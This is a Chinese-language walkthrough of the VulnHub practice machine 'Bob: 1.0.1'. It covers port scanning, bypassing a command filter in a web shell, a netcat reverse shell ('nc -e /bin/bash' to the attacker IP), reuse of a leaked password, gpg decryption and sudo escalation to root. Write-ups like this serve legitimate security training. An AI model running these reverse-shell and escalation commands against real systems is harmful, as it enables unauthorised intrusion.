OSCP难度靶机之Bob: 1.0.1
2022-10-31 08:30:20 Author: 安全孺子牛(查看原文) 阅读量:31 收藏

虚拟机下载地址:https://www.vulnhub.com/entry/bob-101,226/虚拟机简介:您的目标是将旗帜插进/目标:1个flag级别:中级

1、信息收集

1.1通过arp-scan检测主机IP地址

arp-scan 192.168.207.0/24

1.2 通过nmap进行端口扫描

nmap -A -sS -sV -v -p- 192.168.207.134

查看开放21、80、25468端口

2、渗透测试

2.1 WEB渗透

1.站点访问测试

根据nmap扫描结果提示,发现三个网站路径

login.php页面无法访问,访问/lat_memo.html,提示存在一个webshell

访问dev_shell.php发现可以执行系统命令

2.过滤绕过

测试使用pwd命令发现被过滤

测试通过过滤发现存在备份文件

下载备份文件进行查看被过滤的关键词

3.反弹shell

开启NC监听,并获取到反弹shell连接

nc -lnvp 5555

id | nc -e /bin/bash 192.168.207.130 5555

2.2 主机渗透测试

1.主机信息收集

发现存在4个普通账号

python -c 'import pty;pty.spawn("/bin/bash")'

在elliot目录中发现可疑文件theadminisdumb.txt

cd /home/elliot

发现密码文件信息,提示密码为:Qwerty

cat theadminisdumb.txt

2.账号爆破

通过测试多个账号发现jc用户的密码为:Qwerty

su - jc

在bob的目录中发现staff.txt和login.txt.gpg

cd /home/bob/Documents

3.获取密码信息

经过多个方法测试,发现密码为竖着排列:HARPOCRATES

cd /home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here
more notes.sh

4.解密文件

通过密码解密后,获取到bob的账号和密码权限

gpg --batch --passphrase HARPOCRATES -d login.txt.gpg

使用bob密码进行登录

su - bob

5.查看用户sudo权限

查看该用户拥有root所有权限

sudo -l

sudo su

6.查看flag

cd /
cat flag.txt


文章来源: http://mp.weixin.qq.com/s?__biz=MzI2MDI0NTM2Nw==&mid=2247489018&idx=1&sn=2d6d9a92bab24f3bed1f9060143df4cb&chksm=ea6dc7e2dd1a4ef4391b28a414b9eafc7bfebc4d81c4a3fb25c4cd69e7e822db2eb27064ccc0#rd
如有侵权请联系:admin#unsafe.sh